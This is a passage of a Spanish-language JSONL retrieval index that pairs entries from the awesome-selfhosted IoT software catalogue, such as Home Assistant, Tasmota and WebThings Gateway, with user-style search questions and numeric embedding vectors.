-0.0566, -0.03087, -0.01542, 0.00449, 0.04016, -0.01208, 0.00736, 0.00791, 0.0628, -0.00741, 0.00672, 0.08034, 0.14866, -0.04919, -0.14169, 0.15516, -0.06344, 0.04567, -0.00556, 0.01375, -0.01633, -0.05553, -0.05136, -0.03779, 0.04046, 0.00376, -0.02952, 0.04767, 0.02189, -0.06498, 7e-05, -0.01603, -0.04717, -0.01309, -0.01314, -0.05995, 0.08728, 0.07614, 0.00042, 0.06978, 0.05838, 0.04047, 0.08584, -0.06078, 0.01368, -0.05105, -0.03549, -0.04433, 0.03607, -0.10061, -0.07504, -0.03376, -0.01832, 0.04284, -0.05808, -0.09164, 0.03546, -0.03156, -0.01007, 0.05076, 0.0154, 0.02184, 0.00372, 0.00791, -0.02971, 0.03738, 0.01385, 0.02331, -0.04195, -0.02694, -0.06054, 0.06999, -0.03203, -0.08192, 0.0124, 0.01841, -0.00358, -0.05704, -0.00343, 0.0448, 0.05907, 0.07171, -0.04208, 0.03614, 0.03758, 0.04481, -0.05393, -0.08499, 0.01247, 0.02055, 0.07045, -0.11234, -0.01667, 0.03234, -0.03238, -0.0727, -0.01008, 0.00498, 0.03846, -0.00479, 0.06347, 0.07047, 0.00117, 0.04191, 0.02187, -0.01814, 0.10726, -0.05014, -0.0254, -0.08472, -0.02811, 0.08097, -0.02506, -0.00902, 0.03062, -0.00582, 0.03202, 0.04257, 0.0313, -0.01731, 0.02224, 0.04659, 0.0317, -0.01493, 0.08323, -0.04388, -0.03893, 0.00973, -0.02272, -0.02279, -0.01993, -0.00069, 0.09759, -0.0137, 0.04472, -0.00073, -0.0142, 0.04227, -0.01292, 0.07935, -0.01957, -0.0484, -0.02057, -0.03034, -0.0065, -0.00484, 0.02031, 0.00256, 0.03304, -0.03276, -0.04966, -0.01582, -0.02945, 0.0766, 0.04658, -0.03063, -0.05587, -0.02553, -0.06791, -0.03023, -0.04056, -0.09728, -0.00694, 0.04923, 0.08464, -0.06201, 0.01234, 0.00865]} -{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): FMD Server β€” A server to communicate with the FMD (Find My Device) Android app, to locate and control your devices [GPL-3.0, Docker/Go]. Gladys β€” Privacy-first home assistant [Apache-2.0, Nodejs/Docker]. Home Assistant β€” Home automation platform [Apache-2.0, Python/Docker]. ioBroker β€” Integration platform for the Internet of Things, focused on building automation, smart metering, ambient assisted living, process automation, visualization and data logging [MIT, Nodejs]. LHA β€” Light Home Automation application that is fully extensible using Blockly, HTML or Lua. It includes extensions such as ConBee, Philips Hue or Z-Wave JS [MIT, Lua]. Node RED β€” Browser-based flow editor that helps you wiring hardware devices, APIs and online services to create IoT solutions [Apache-2.0, Nodejs/Docker]. Onloc β€” Track and share your location in real time. Control and lock stolen or lost phones [AGPL-3.0, Docker]. openHAB β€” Vendor and technology agnostic open source software for home automation [EPL-2.0, Java].", "indexar": "cΓ³mo encontrar una plataforma que me permita monitorizar y gestionar mis sensores del hogar de manera sencilla?", "v": [-0.0122, 0.09856, -0.18816, -0.22818, -0.00997, -0.09371, -0.0888, -0.09285, -0.17877, -0.12133, -0.13448, 0.01392, 0.06534, -0.03297, 0.12161, 0.07129, 0.15275, -0.11941, -0.04123, 0.0355, -0.02823, 0.00928, -0.06565, -0.07528, -0.02749, -0.07802, 0.09103, -0.09726, -0.09296, -0.04079, -0.05349, -0.06094, 0.03275, 0.04033, -0.13748, -0.11325, 0.00798, 0.01292, 0.0168, -0.03543, -0.05507, 0.06616, 0.03995, -0.03211, 0.11626, -0.05118, 0.01831, -0.07276, 0.04103, -0.01651, -0.1612, 0.0048, -0.13079, 0.13332, 0.01214, -0.08952, 0.14934, -0.01342, 0.19724, -0.09139, -0.0615, 0.04446, 0.11274, 0.05718, -0.03174, -0.01586, 0.0682, 0.04818, -0.08403, 0.04022, 0.05613, 0.04579, -0.01742, -0.00357, 0.01899, 0.04078, -0.02511, -0.05834, 0.08147, -0.05569, 0.0786, -0.00942, -0.08865, 0.01491, 0.0513, -0.1037, -0.00985, -0.07404, -0.03149, -0.09878, -0.01802, 0.00829, 0.00497, -0.02329, 0.02413, -0.03045, 0.09348, 0.00586, -0.0876, -0.01445, 0.01762, -0.01711, -0.05649, 0.09265, -0.01333, 0.03327, 0.05137, -0.04617, -0.02266, -0.1594, -0.03826, 0.07234, -0.02203, 0.01583, -0.02733, 0.06749, -0.12158, -0.03675, 0.01764, -0.00762, -0.03357, -0.02323, 0.11073, -0.04612, 0.10505, -0.03847, 0.03644, 0.01362, 0.07216, 0.02057, -0.02069, -0.07721, -0.01665, -0.01382, -0.00419, 0.02818, -0.02983, -0.02206, -0.0564, -0.08729, -0.03494, 0.11117, 0.06195, -0.11293, 0.12378, -0.05127, 0.0145, -0.02654, -0.06731, 0.10568, -0.05077, 0.00939, -0.04542, -0.0225, -0.0129, -0.02465, 0.01696, -0.0235, -0.12952, 0.01594, -0.02765, -0.00555, -0.05051, 0.00849, -0.0085, 0.02449, 0.00095, 0.07671, 0.04016, -0.01876, -0.04179, 0.10739, 0.00306, -0.06402, 0.0593, -0.02108, -0.03731, -0.0739, 0.0015, -0.00612, -0.02248, 0.07562, -0.02247, 0.02245, 0.01261, 0.03149, 0.00411, 0.06721, -0.02053, 0.05879, 0.00028, 0.04373, -0.05473, 0.01386, 0.08735, -0.051, -0.03183, -0.02816, -0.00493, 0.00052, -0.05642, -0.04134, 0.08518, -0.01647, -0.01136, 0.01808, -0.03026, -0.00258, 0.05011, -0.02234, -0.01543, -0.00134, 0.06866, -0.05281, -0.04526, 0.02552, 0.00305, -0.01884, -0.00542, 0.00659, 0.07142, 0.02972, 0.00173, 0.00686, -0.03975, 0.00148, 0.02564, 0.03405, -0.03179, -0.06024, -0.01053, -0.05178, 0.01737, 0.02356, 0.00338, -0.07038, 0.00087, -0.0068, -0.02541, -0.00424, 0.00466, 0.03366, 0.02226, 0.00295, -0.02786, -0.04959, -0.03494, 0.05844, -0.00492, -0.05302, -0.00187, -0.04048, 0.06578, 0.00124, 0.00356, -0.03085]} -{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): OpenRemote β€” IoT Asset management, Flow Rules and WHEN-THEN rules, Data visualization, Edge Gateway [AGPL-3.0, Java]. polluSensWeb β€” Web-based serial interface and charting tool for visualizing and logging data from UART pollution sensors (PM2.5, VOC, etc). Features live data acquisition, dynamic charts, CSV export, and webhook integration [MIT, Javascript]. SIP Irrigation Control β€” Open source software for sprinkler/irrigation control [GPL-3.0, Python]. SOLECTRUS β€” Photovoltaic dashboard that displays energy production and consumption with cost and savings calculations [AGPL-3.0, Docker]. Tasmota β€” Open source firmware for ESP devices. Total local control with quick setup and updates. Control using MQTT, Web UI, HTTP or serial. Automate using timers, rules or scripts. Integration with home automation solutions [GPL-3.0, C/C++]. Thingsboard β€” Open-source IoT Platform - Device management, data collection, processing and visualization [Apache-2.0, Java/Docker/K8S].", "indexar": "que programa puedo usar para gestionar y visualizar datos de sensores de contaminaciΓ³n en tiempo real?", "v": [0.02038, 0.06031, -0.12409, -0.23999, -0.02645, -0.07623, -0.11233, -0.02282, -0.05489, -0.06972, -0.11141, -0.10548, 0.00602, -0.06235, -0.00223, 0.07109, 0.08919, -0.11905, -0.04875, 0.00565, -0.00768, -0.09913, -0.02403, -0.02119, -0.03572, 0.11873, 0.00737, -0.06982, -0.06442, 0.00103, -0.00499, 0.0241, 0.08533, -0.03935, -0.14339, -0.03667, -0.01641, 0.03653, 0.02979, -0.05338, 0.05843, 0.03669, -0.06128, 0.00753, 0.14377, -0.04266, -0.00562, -0.03336, -0.10743, -0.06949, -0.10742, 0.09854, -0.05313, 0.03409, 0.08787, -0.13719, 0.04343, -0.08693, 0.05893, -0.06949, -0.01519, 0.06329, 0.07732, 0.03979, 0.00414, -0.04273, 0.17911, 0.0832, -0.06521, 0.0222, -0.01418, -0.06182, 0.0608, -0.05841, 0.09282, -0.05728, 0.02977, 0.01991, -0.00572, -0.04826, -0.03002, -0.00085, 0.03335, 0.01751, 0.01383, -0.04598, 0.05511, -0.06264, -0.05545, -0.05086, -0.07249, 0.10095, 0.0759, 0.00127, 0.08597, 0.1071, 0.08489, -0.01635, -0.03789, 0.1704, 0.09054, 0.02997, -0.07778, 0.0837, 0.02338, 0.05552, 0.06759, -0.13204, 0.01411, -0.06312, -0.12459, -0.05604, -0.01549, -0.113, 0.00479, -0.01422, 0.02866, -0.14933, -0.08513, -0.00789, -0.04599, -0.05219, 0.03526, 0.00715, 0.10067, -0.00834, -0.03356, 0.01869, -0.03379, 0.08678, -0.07873, 0.03251, -0.05698, -0.07462, -0.00795, -0.00249, -0.08831, -0.00186, 0.01002, -0.06069, -0.07673, 0.1293, -0.01126, 0.03434, 0.04445, -0.00474, -0.07517, -0.03621, -0.07763, 0.00739, 0.07507, -0.08182, 0.02308, 0.05153, -0.00992, 0.00878, 0.05136, -0.01014, -0.09698, -0.0707, -0.04749, 0.03916, -0.04658, 0.03526, 0.08235, -0.0447, 0.12548, 0.03274, 0.06817, 0.01139, -0.01218, 0.0655, 0.05399, -0.05825, 0.04423, 0.0016, 0.01159, -0.12668, 0.02388, -0.0358, -0.0072, 0.01858, 0.01677, 0.01334, 0.01563, 0.04188, -0.0256, 0.07275, -0.05221, -0.00263, 0.0396, 0.07023, 0.08624, 0.05278, 0.07404, -0.03086, 0.02634, -0.01482, -0.02885, -0.04761, -0.01907, -0.0168, 0.00262, 0.01228, 0.02885, 0.10365, -0.04463, 0.03521, 0.09727, -0.0058, -0.01835, -0.01841, 0.03058, -0.03456, -0.08392, 0.01778, 0.05951, 0.00641, 0.04897, 0.00164, 0.00232, 0.04743, 0.08071, 0.00196, -0.03115, -0.103, 0.05921, 0.0483, 0.02971, -0.0386, -0.0488, -0.00207, -0.00978, -0.00971, -0.0117, -0.0055, 0.00349, -0.05264, -0.01508, -0.10845, -0.02824, 0.08963, 0.00847, -0.05925, -0.01963, 0.00967, -0.07606, 0.048, 0.0199, -0.05781, -0.04875, -0.03371, 0.06594, 0.01428, 0.03696, 0.01099]} -{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): OpenRemote β€” IoT Asset management, Flow Rules and WHEN-THEN rules, Data visualization, Edge Gateway [AGPL-3.0, Java]. polluSensWeb β€” Web-based serial interface and charting tool for visualizing and logging data from UART pollution sensors (PM2.5, VOC, etc). Features live data acquisition, dynamic charts, CSV export, and webhook integration [MIT, Javascript]. SIP Irrigation Control β€” Open source software for sprinkler/irrigation control [GPL-3.0, Python]. SOLECTRUS β€” Photovoltaic dashboard that displays energy production and consumption with cost and savings calculations [AGPL-3.0, Docker]. Tasmota β€” Open source firmware for ESP devices. Total local control with quick setup and updates. Control using MQTT, Web UI, HTTP or serial. Automate using timers, rules or scripts. Integration with home automation solutions [GPL-3.0, C/C++]. Thingsboard β€” Open-source IoT Platform - Device management, data collection, processing and visualization [Apache-2.0, Java/Docker/K8S].", "indexar": "cual es una alternativa libre a las soluciones comerciales para el control automΓ‘tico de sistemas de riego?", "v": [0.0013, 0.0099, -0.1183, -0.05772, -0.0287, -0.1122, -0.05518, -0.00742, -0.23162, 0.00738, -0.07795, -0.23587, 0.08056, -0.06542, 0.21851, -0.05178, -0.02552, -0.05484, -0.00138, 0.02728, -0.04798, -0.11522, -0.00156, -0.03495, 0.02132, 0.0484, 0.08983, -0.0749, -0.16159, 0.13765, 0.05464, 0.03759, 0.10769, -0.10843, -0.11454, 0.0391, 0.08876, 0.11807, 0.04832, -0.03934, 0.06006, -0.17304, -0.09, 0.00535, 0.10804, -0.04341, 0.04564, -0.00422, -0.04886, 0.00066, -0.05216, 0.00623, -0.09773, -0.02294, 0.10006, -0.05525, 0.07343, 0.05664, -0.01606, -0.0972, 0.02217, 0.01004, 0.0732, 0.00664, 0.01085, 0.03492, -0.08127, 0.0093, 0.01409, 0.02815, 0.03952, -0.01966, 0.00633, 0.00582, -0.04138, 0.12696, -0.0279, 0.07678, -0.02766, -0.04032, 0.01118, -0.09302, -0.07788, 0.0492, 0.01973, -0.09837, -0.02454, -0.09769, -0.01804, -0.00619, 0.00771, -0.04694, 0.07241, 0.08652, 0.08208, -0.05652, -0.03893, 0.0558, -0.00522, 0.0938, 0.06754, -0.01352, -0.10879, -0.01799, 0.00331, -0.07551, 0.02849, -0.06044, -0.05223, -0.05018, -0.05575, 0.05753, 0.08415, -0.03221, -0.03276, 0.03897, 0.06111, 0.04445, -0.01388, 0.04066, -0.09596, -0.02027, 0.04609, -0.03969, 0.09353, -0.01779, 0.08782, 0.09667, -0.04251, 0.05002, 0.06537, -0.02855, -0.08744, -0.0321, 0.01725, 0.01189, 0.00771, 0.01699, -0.04253, 0.03925, -0.08223, 0.05402, 0.01189, -0.03253, 0.11, -0.02976, -0.00539, -0.07628, 0.0363, 0.00428, 0.01235, 0.06228, 0.001, 0.07942, -0.0337, 0.00871, -0.01409, 0.00935, -0.02291, 0.05779, 0.03632, -0.0323, -0.01607, 0.01725, -0.03656, -0.02815, -0.03346, -0.0667, 0.00918, 0.00926, -0.00297, 0.05962, -0.02374, -0.09556, 0.03184, -0.01712, -0.00411, -0.13593, 0.06744, -0.05032, -0.0505, 0.01149, -0.11662, -0.02581, -0.02179, -0.03669, -0.06601, -0.02112, 0.05346, 0.04807, -0.00698, 0.02339, -0.09845, -0.10884, -0.0054, 0.00968, -0.03974, -0.07223, -0.04603, -0.03812, -0.10137, 0.03625, 0.03885, -0.08225, -0.04003, 0.04917, -0.00297, 0.08223, 0.02154, 0.02565, 0.01135, -0.00151, 0.08618, -0.0371, -0.05383, -0.01424, 0.00166, -0.04367, 0.01559, -0.04732, 0.04136, -0.00458, 0.06948, 0.00701, -0.01246, -0.00708, 0.03015, 0.08134, -0.02202, -0.00348, -0.04645, -0.01963, 0.025, 0.00216, 0.05693, 0.01189, 0.02157, -0.06274, 0.02483, -0.0841, 0.09286, 0.06098, -0.01534, -0.06863, -0.03555, -0.02172, -0.1249, 0.01366, -0.06038, -0.08155, -0.01512, 0.0708, -0.01372, -0.00972, 0.06702, 0.00366]} -{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): OpenRemote β€” IoT Asset management, Flow Rules and WHEN-THEN rules, Data visualization, Edge Gateway [AGPL-3.0, Java]. polluSensWeb β€” Web-based serial interface and charting tool for visualizing and logging data from UART pollution sensors (PM2.5, VOC, etc). Features live data acquisition, dynamic charts, CSV export, and webhook integration [MIT, Javascript]. SIP Irrigation Control β€” Open source software for sprinkler/irrigation control [GPL-3.0, Python]. SOLECTRUS β€” Photovoltaic dashboard that displays energy production and consumption with cost and savings calculations [AGPL-3.0, Docker]. Tasmota β€” Open source firmware for ESP devices. Total local control with quick setup and updates. Control using MQTT, Web UI, HTTP or serial. Automate using timers, rules or scripts. Integration with home automation solutions [GPL-3.0, C/C++]. Thingsboard β€” Open-source IoT Platform - Device management, data collection, processing and visualization [Apache-2.0, Java/Docker/K8S].", "indexar": "con que herramienta puedo monitorizar la producciΓ³n solar y los gastos energΓ©ticos de mi instalaciΓ³n fotovoltaica?", "v": [0.12279, -0.05828, -0.24474, -0.19892, 0.06962, -0.01833, -0.0076, -0.03018, -0.10348, -0.09406, -0.1038, -0.00896, 0.00783, -0.01603, 0.02544, 0.05059, 0.02171, -0.1573, -0.08203, 0.09881, -0.09241, -0.0273, -0.09344, -0.05818, -0.05102, 0.15963, -0.05629, -0.06089, -0.15321, 0.07683, 0.05897, 0.07296, 0.04631, -0.08486, -0.09529, -0.03437, -0.03797, -0.01019, 0.06265, -0.10552, -0.03447, -0.01666, 0.05788, -0.05857, 0.07791, -0.00076, 0.03708, -0.10562, 0.03126, 0.00576, -0.0845, 0.02838, -0.02479, 0.10741, 0.1224, -0.13422, 0.07139, -0.10508, 0.08549, -0.019, 0.00901, 0.13026, 0.02545, -0.05102, 0.00398, 0.11102, 0.01257, -0.00371, 0.0235, 0.00276, -0.01351, -0.07016, -0.0913, -0.09986, 0.07332, 0.07392, -0.00486, -0.03365, 0.02938, -0.10302, -0.03694, -0.06927, -0.04365, 0.04875, -0.0802, -0.03365, 0.05997, 0.03196, -0.06871, -0.04634, -0.06519, -0.00759, 0.02129, 0.12879, -0.01758, 0.04351, 0.08753, -0.00323, -0.06623, 0.03524, 0.03787, 0.02939, 0.0402, 0.05652, 0.14535, -0.05483, -0.02133, -0.09938, -0.00877, -0.03709, -0.03606, 0.05516, -0.05546, -0.08605, -0.02482, 0.09036, -0.05528, -0.05298, -0.12123, -0.03923, 0.03939, -0.00976, 0.04079, -0.02338, 0.12721, 0.00032, -0.08011, 0.01318, -0.01471, 0.0517, 0.02359, -0.10996, 0.07153, 0.01855, -0.07707, -0.00971, -0.07906, -0.0889, -0.0248, -0.04114, -0.00208, 0.06401, 0.0324, -0.09539, 0.04273, -0.00199, -0.0235, -0.03695, 0.03042, -0.00789, 0.01866, -0.00043, 0.0004, 0.02622, -0.06522, 0.04764, 0.02761, 0.04531, -0.01832, -0.00929, -0.02645, -0.02833, -0.00242, 0.04171, 0.04621, -0.03671, -0.07519, 0.0214, 0.04953, 0.02975, -0.04455, 0.07464, -0.01119, 0.00799, 0.07442, -0.04263, 0.01492, -0.06531, 0.0129, -0.00992, -0.01494, 0.04624, -0.11773, -0.02063, -0.01755, 0.12664, -0.02644, -0.00958, 0.11146, 0.00474, 0.02986, 0.04848, -0.01327, -0.01116, 0.00733, -0.03742, -0.01294, -0.06418, 0.0331, -0.00545, 0.00136, 0.01376, -0.00235, -0.00337, 0.04037, 0.04046, -0.04634, 0.10634, 0.01065, -0.0191, 0.04664, 0.00903, 0.07481, -0.05908, -0.0574, -0.04948, 0.0633, -0.01866, -0.03381, 0.01803, 0.1282, 0.0251, 0.03697, 0.01733, 0.06411, -0.02443, 0.14148, 0.0238, -0.03847, 0.05535, -0.10527, 0.00417, -0.02194, -0.04364, 0.00274, 0.02891, -0.01492, -0.04179, -0.06533, 0.04774, -0.00757, 0.05797, 0.05182, 0.01529, -0.05186, -0.00962, -0.05545, 0.03538, 0.03707, -0.05495, -0.00385, 0.01423, 0.06123, 0.0013, 0.04528, -0.03535]} -{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): WebThings Gateway β€” WebThings is an open source implementation of the Web of Things, including the WebThings Gateway and the WebThings Framework [MPL-2.0, Nodejs].", "indexar": "que programa puedo usar para conectar dispositivos IoT a la nube", "v": [-0.05071, 0.02925, -0.2478, -0.14463, 0.1276, -0.06142, -0.1186, -0.04546, -0.15725, -0.05132, -0.14304, -0.1317, -0.04117, 0.04654, -0.16738, -0.01046, 0.10112, -0.08574, -0.02225, -0.08134, -0.02717, 0.0538, -0.10267, -0.00519, -0.07439, 0.16311, 0.06068, 0.11488, -0.0911, -0.01581, -0.07645, -0.0857, 0.09058, -0.00708, -0.12924, -0.14055, -0.04862, 0.10455, -0.00141, -0.01529, 0.03654, 0.04519, -0.05798, 0.1142, 0.18428, 0.0242, 0.04272, -0.09436, -0.02834, 0.01865, -0.1358, 0.01035, -0.04678, 0.05, -0.11753, -0.02514, 0.11289, -0.09825, 0.03587, -0.04284, -0.09767, 0.01347, -0.00493, -0.08658, -0.01021, -0.00728, -0.05121, 0.11246, -0.10216, 0.00579, 0.08483, 0.01829, -0.05651, 0.04665, 0.06651, 0.17515, -0.01897, -0.0792, 0.06574, 0.02057, -0.08376, 0.04152, 0.10299, -0.00776, -0.05436, 0.04156, 0.03403, 0.00552, 0.01348, -0.00891, -0.05588, 0.0638, 0.05876, -0.07068, 0.05401, 0.00536, 0.047, 0.03035, 0.01568, 0.07487, 0.05346, 0.05936, -0.0719, 0.10744, -0.0568, -0.01633, 0.08525, -0.03103, -0.00688, -0.00404, -0.02436, -0.04669, -0.0136, -0.06022, -0.02333, 0.00401, 0.02523, -0.12157, -0.00149, 0.05849, -0.04172, -0.00631, 0.04482, 0.00882, 0.10274, 0.04958, -0.03377, 0.08192, -0.01697, -0.02135, 0.05793, 0.03083, 0.00463, -0.03126, -0.06424, 0.00504, -0.03657, -0.13887, 0.00841, -0.00356, 0.04518, 0.0167, -0.0379, 0.01803, 0.06439, -0.08328, -0.01835, 0.01504, 0.03091, 0.04122, 0.03156, 0.04235, -0.12131, 0.01404, -0.07774, -0.00403, 0.02744, -0.02726, -0.0768, 0.02747, -0.02669, -0.0172, -0.01103, -0.01978, 0.02655, -0.01861, 0.00745, 0.03324, 0.09585, 0.09524, -0.05808, 0.07516, -0.01722, 0.02564, 0.00303, -0.00216, 0.04613, -0.00949, 0.03405, -0.05013, -0.08393, -0.01834, 0.04984, -0.02655, 0.0381, 0.04886, -0.01594, -0.00873, -0.02194, 0.06599, -0.02619, 0.00345, 0.02475, 0.05249, 0.05599, -0.0948, -0.02682, -0.05794, -0.03306, 0.05642, -0.05229, 0.04036, -0.01126, 3e-05, 0.0546, 0.04546, -0.03393, 0.01411, 0.06214, 0.03664, 0.00714, -0.07629, 0.04153, -0.00882, -0.00927, 0.00098, -0.03097, 0.00825, 0.0021, 0.01307, 0.00574, -0.01453, -0.01547, 0.01873, 0.02563, 0.0253, -0.03131, 0.02318, -0.00667, -0.05104, -0.01301, -0.03152, 0.00669, -0.04846, -0.03054, 0.00425, -0.01913, -0.00626, -0.03284, -0.01079, -0.06922, 0.08517, 0.01077, -0.00781, -0.04059, -0.03274, -0.08738, 0.01003, -0.01589, -0.03428, -0.02741, 0.07266, 0.07796, -0.05085, -0.00142, 0.05431]} -{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): WebThings Gateway β€” WebThings is an open source implementation of the Web of Things, including the WebThings Gateway and the WebThings Framework [MPL-2.0, Nodejs].", "indexar": "con que herramienta puedo gestionar el ecosistema de objetos en la web", "v": [0.03075, 0.03484, -0.12533, -0.25989, 0.01335, -0.03253, -0.11258, 0.04576, -0.01774, -0.15502, -0.11761, -0.0574, -0.01393, 0.00347, 0.05317, 0.12785, 0.20604, -0.15486, -0.11344, 0.00816, -0.07069, 0.05608, -0.09437, 0.04989, -0.02176, -0.04273, 0.02871, 0.00748, -0.10391, 0.13174, -0.05035, 0.08095, 0.03746, -0.09617, -0.08857, -0.03843, -0.03994, -0.00511, 0.01727, -0.09749, -0.05462, 0.08653, -0.04301, 0.04546, 0.08061, 0.04075, 0.01301, -0.0621, -0.02558, -0.01513, -0.12493, -0.1715, -0.24937, -0.06016, 0.05676, -0.09455, 0.18258, -0.13468, 0.12143, -0.04652, -0.13452, 0.09227, -0.08771, 0.03549, -0.03693, -0.02853, 0.01657, 0.05401, -0.09805, 0.0834, 0.06461, -0.04359, 0.05765, 0.00706, 0.07988, 0.02966, 0.03253, 0.04387, 0.00519, 0.02155, -0.00274, -0.03469, -0.03189, 0.01202, -0.02666, -0.10192, 0.00572, -0.04819, 0.03649, -0.12394, -0.07782, 0.03819, -0.00192, -0.1281, -0.00778, 0.00126, 0.01401, -0.0427, -0.00305, 0.05264, 0.0322, -0.0158, -0.12964, 0.06378, -0.01801, 0.05974, 0.0279, -0.02576, -0.08515, -0.04186, 0.00586, 0.01009, 0.02463, -0.02455, 0.00391, 0.09183, -0.02968, -0.03515, 0.01758, 0.01032, 0.00802, 0.00047, -0.02072, -0.00876, 0.05793, 0.05566, -0.01524, 0.03943, 0.0164, -0.08636, -0.04885, 0.03199, -0.00536, 0.02792, -0.00811, -0.04407, -0.01234, -0.11189, 0.01594, -0.02058, -0.04911, 0.0442, -0.0459, -0.00835, 0.09628, -0.05899, 0.00601, -0.03683, -0.03146, 0.0053, 0.04329, -0.08273, 0.02586, 0.00894, -0.05938, 0.02455, -0.0865, 0.04961, -0.09671, -0.02614, -0.04018, -0.02311, 0.0365, 0.0969, 0.01729, -0.03567, 0.05477, 0.03048, 0.02407, 0.06354, 0.02158, -0.00037, 0.03464, -0.00422, 0.02104, -0.02339, -0.04072, -0.07405, 0.06688, -0.06095, -0.06245, -0.01987, -0.02544, -0.00342, 0.00529, -0.03304, 0.01018, 0.0721, -0.09291, 0.11129, 0.02302, 0.06103, 0.01143, 0.00292, 0.09753, 0.02571, -0.01142, -0.02369, 0.00236, 0.01525, 0.01269, -0.02693, 0.03677, -0.02781, -0.0218, 0.06266, -0.01298, -0.00872, 0.02554, 0.00457, 0.04049, 0.00435, 0.03146, -0.0138, -0.01609, -0.03033, -0.02302, 0.051, -0.03916, -0.01473, 0.04774, 0.01128, 0.07014, -0.03089, 0.00687, 0.00093, -0.03396, 0.03283, 0.03765, -0.03886, 0.0074, -0.09073, -0.00465, 0.02315, -0.00574, -0.0208, 0.05636, -0.06246, -0.0751, 0.05792, -0.06603, 0.03691, 0.01708, -0.00288, -5e-05, -0.03196, -0.04369, 0.0061, -0.07713, -0.06976, -0.03476, -0.01527, 0.03337, -0.0306, -0.00669, 0.02561]} -{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): WebThings Gateway β€” WebThings is an open source implementation of the Web of Things, including the WebThings Gateway and the WebThings Framework [MPL-2.0, Nodejs].", "indexar": "cual es una alternativa libre al gateway de cosas conectadas", "v": [0.05313, 0.1481, -0.09459, 0.00511, -0.07736, -0.07275, -0.06247, -0.0446, -0.0946, -0.02191, -0.02213, -0.23614, -0.0936, 0.19663, 0.06347, 0.03013, 0.09955, 0.01706, 0.09933, -0.12693, -0.08134, 0.10401, -0.01443, -0.16108, -0.05607, -0.10798, 0.12783, 0.02854, -0.08322, 0.02899, -0.00203, -0.06076, 0.08027, -0.00728, -0.07367, -0.03016, 0.10757, 0.13122, 0.147, -0.0763, -0.00847, -0.1024, -0.10562, 0.13072, 0.07497, -0.09015, -0.03108, -0.05061, -0.03218, 0.07172, -0.16824, -0.04026, -0.09459, 0.04565, 0.05996, 0.02276, 0.1556, -0.07868, -0.04911, 0.02548, -0.14153, 0.06838, 0.00281, -0.06915, -0.06945, -8e-05, 0.00543, 0.03231, -0.04027, 0.08794, 0.1125, 0.01661, 0.04107, -0.04135, -0.09322, 0.1077, -0.00237, -0.03434, 0.00181, 0.14095, 0.05757, -0.06813, 0.06692, 0.06264, -0.02695, -0.0767, 0.03668, -0.04808, 0.01277, 0.01508, 0.02508, -0.00068, -0.03908, 0.07836, -0.02492, -0.08515, -0.04065, -3e-05, 0.03499, 0.04801, 0.06312, 0.03305, -0.08666, 0.02895, 0.01758, -0.06879, -0.02132, -0.04131, 0.00685, 0.03463, 0.00881, 0.10524, -0.00547, -0.03384, -0.04518, 0.00776, -0.05031, 0.00579, -0.0506, -0.00566, -0.06898, -0.0282, -0.00918, -0.07701, 0.04765, 0.0531, 0.07453, 0.07892, -0.02206, 0.012, 0.06253, -0.00477, -0.00719, -0.13588, -0.12499, -0.06837, 0.01101, -0.06047, 0.09094, -0.01926, -0.05234, 0.00782, 0.03823, -0.00308, 0.03124, -0.05895, -0.02151, -0.00402, -0.07318, 0.02025, -0.077, -0.0143, -0.04235, 0.06732, 0.0103, 0.0353, -0.07117, 0.01596, -0.01874, 0.06673, 0.04071, 0.01489, 0.04073, -0.02694, 0.0179, -0.05893, -0.03607, -0.00891, -0.02599, 0.04951, -0.03446, 0.07871, 0.04465, -0.04919, 0.01854, -0.07198, -0.01407, -0.05118, 0.00506, -0.02782, 0.06027, -0.04016, -0.08812, -0.0085, 0.03221, 0.01908, -0.0157, 0.00923, 0.02669, 0.05315, -0.02644, -0.04775, -0.10422, -0.06973, 0.00931, -0.02384, 0.06478, -0.11096, 0.01318, 0.03163, -0.06577, -0.09253, 0.04991, -0.0432, -0.00838, 0.03717, -0.01137, -0.06735, 0.00948, 0.03941, 0.10381, -0.02407, 0.07564, -0.05722, -0.04606, -0.02832, -0.02638, -0.03488, -0.02278, -0.00769, 0.04666, 0.00022, -0.00344, 0.01977, 0.01838, 0.02727, -0.00874, 0.04745, -0.07194, -0.01993, 0.02451, -0.03689, -0.01305, 0.02168, -0.00616, -0.02944, -0.05666, 0.03913, 0.00329, -0.02441, -0.00045, 0.06629, -0.01579, -0.00267, 0.00012, -0.00591, -0.06305, -0.06408, -0.01808, -0.0546, 